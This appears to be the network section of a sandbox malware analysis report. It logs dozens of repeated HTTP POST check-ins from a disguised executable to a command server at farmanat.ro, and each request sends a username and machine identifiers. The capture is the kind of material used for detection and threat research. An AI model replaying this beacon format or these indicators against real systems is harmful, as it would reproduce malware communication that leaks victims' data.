                                              Nov 25, 2021 10:53:21.387957096 CET7171OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:21.421602964 CET7172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:21.490827084 CET7172INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              616192.168.11.2050461176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:21.894494057 CET7173OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:21.928659916 CET7173OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:21.984409094 CET7173INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              617192.168.11.2050462176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:22.409034967 CET7174OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:22.443284988 CET7174OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:22.498653889 CET7175INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              618192.168.11.2050463176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:22.929209948 CET7175OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:22.962769985 CET7176OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:23.012940884 CET7176INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              619192.168.11.2050464176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:23.429111958 CET7177OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:23.463131905 CET7177OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:23.516483068 CET7177INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              62192.168.11.2049898176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:40.780535936 CET6395OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:40.813941002 CET6395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:40.863092899 CET6396INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              620192.168.11.2050465176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:23.867976904 CET7178OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:23.901633978 CET7178OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:23.950930119 CET7179INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              621192.168.11.2050466176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:24.376610041 CET7179OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:24.410288095 CET7180OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:24.459855080 CET7180INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              622192.168.11.2050467176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:24.847520113 CET7181OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:24.881690025 CET7181OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:24.931727886 CET7181INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              623192.168.11.2050468176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:25.354969025 CET7182OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:25.389082909 CET7182OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:25.439336061 CET7183INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              624192.168.11.2050469176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:25.882853985 CET7183OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:25.917002916 CET7184OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:25.969530106 CET7184INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              625192.168.11.2050470176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:26.385596037 CET7185OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:26.419796944 CET7185OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:26.469978094 CET7185INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              626192.168.11.2050471176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:26.886543989 CET7186OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:26.920208931 CET7186OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:26.969342947 CET7187INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              627192.168.11.2050472176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:27.350877047 CET7187OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:27.384341002 CET7188OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:27.433881998 CET7188INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              628192.168.11.2050473176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:27.846662998 CET7189OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:27.880913019 CET7189OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:27.932095051 CET7189INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              629192.168.11.2050474176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:28.355335951 CET7190OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:28.388993979 CET7190OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:28.439199924 CET7191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              63192.168.11.2049899176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:41.373512030 CET6396OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:41.406961918 CET6396OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:41.457207918 CET6397INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              630192.168.11.2050475176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:28.862322092 CET7191OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:28.896070957 CET7192OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:28.948648930 CET7192INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              631192.168.11.2050476176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:29.372843027 CET7193OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:29.407104015 CET7193OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:29.457895041 CET7193INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
